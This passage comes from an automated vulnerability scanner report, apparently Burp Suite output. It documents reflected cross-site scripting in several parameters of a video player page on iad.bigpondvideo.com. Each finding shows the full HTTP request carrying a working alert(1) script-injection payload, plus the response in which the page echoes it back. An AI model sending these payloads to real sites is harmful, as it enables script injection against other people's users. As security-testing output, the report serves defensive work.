GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=04e507</script><script>alert(1)</script>eb57accf720&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:15 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
ashplayer',
                               'wmode','transparent'
                               , 'flashvars','randFlashId=43&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=04e507</script><script>alert(1)</script>eb57accf720&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=
...[SNIP]...

2.564. http://iad.bigpondvideo.com/indexInfinityPlayer.php [randId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the randId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d54cb</script><script>alert(1)</script>df45374e90f was submitted in the randId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43d54cb</script><script>alert(1)</script>df45374e90f&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:15:39 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8777

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
lowscriptaccess','always',
                               'allowfullscreen','true',
                               'pluginspage','http://www.macromedia.com/go/getflashplayer',
                               'wmode','transparent'
                               , 'flashvars','randFlashId=43d54cb</script><script>alert(1)</script>df45374e90f&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&t
...[SNIP]...

2.565. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showBw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the showBw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2f91</script><script>alert(1)</script>df1a7fa6990 was submitted in the showBw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1c2f91</script><script>alert(1)</script>df1a7fa6990&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:01 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1c2f91</script><script>alert(1)</script>df1a7fa6990&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&al
...[SNIP]...

2.566. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showBw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the showBw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7286f</script><script>alert(1)</script>ec6882bd4c8 was submitted in the showBw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=17286f</script><script>alert(1)</script>ec6882bd4c8&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:12:55 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
ftMargin        = 0;
var domain                    = "http://iad.bigpondvideo.com/";
var initParams;
var InternetExplorer        = navigator.appName.indexOf("Microsoft") != -1;
var isError                    = false;
var showBw                    = "17286f</script><script>alert(1)</script>ec6882bd4c8";
var showFeedback            = "1";
var showMenu                = "1";
var showTooltip                = "1";
var loadedItemCount            = 0;
var os                        = "MacOs";
var clientOs                = (ua.indexOf("macintosh") != -1 || ua.indexOf("mac
...[SNIP]...

2.567. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showFeedback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the showFeedback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34eea</script><script>alert(1)</script>ea5b61df946 was submitted in the showFeedback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=134eea</script><script>alert(1)</script>ea5b61df946&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:46 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
s','randFlashId=43&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=134eea</script><script>alert(1)</script>ea5b61df946&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&
...[SNIP]...

2.568. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showFeedback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the showFeedback request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb629</script><script>alert(1)</script>ad6c92c36ca was submitted in the showFeedback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1bb629</script><script>alert(1)</script>ad6c92c36ca&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:41 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
                   = "http://iad.bigpondvideo.com/";
var initParams;
var InternetExplorer        = navigator.appName.indexOf("Microsoft") != -1;
var isError                    = false;
var showBw                    = "1";
var showFeedback            = "1bb629</script><script>alert(1)</script>ad6c92c36ca";
var showMenu                = "1";
var showTooltip                = "1";
var loadedItemCount            = 0;
var os                        = "MacOs";
var clientOs                = (ua.indexOf("macintosh") != -1 || ua.indexOf("mac os x") != -1) ? "MacOs" :
...[SNIP]...

2.569. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showMenu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the showMenu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f8cb</script><script>alert(1)</script>0096577a6c5 was submitted in the showMenu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=15f8cb</script><script>alert(1)</script>0096577a6c5&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:23 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
orFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=15f8cb</script><script>alert(1)</script>0096577a6c5&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&
...[SNIP]...

2.570. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showMenu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the showMenu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d12cd</script><script>alert(1)</script>da08114859f was submitted in the showMenu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1d12cd</script><script>alert(1)</script>da08114859f&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:18 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
ndvideo.com/";
var initParams;
var InternetExplorer        = navigator.appName.indexOf("Microsoft") != -1;
var isError                    = false;
var showBw                    = "1";
var showFeedback            = "1";
var showMenu                = "1d12cd</script><script>alert(1)</script>da08114859f";
var showTooltip                = "1";
var loadedItemCount            = 0;
var os                        = "MacOs";
var clientOs                = (ua.indexOf("macintosh") != -1 || ua.indexOf("mac os x") != -1) ? "MacOs" : "Windows";
var rand                
...[SNIP]...

2.571. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showTitle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the showTitle request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5700</script><script>alert(1)</script>1d16117e5bd was submitted in the showTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1a5700</script><script>alert(1)</script>1d16117e5bd&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:12:13 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
21d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1a5700</script><script>alert(1)</script>1d16117e5bd&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=2
...[SNIP]...

2.572. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showTooltip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the showTooltip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96db0</script><script>alert(1)</script>c1761b81538 was submitted in the showTooltip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

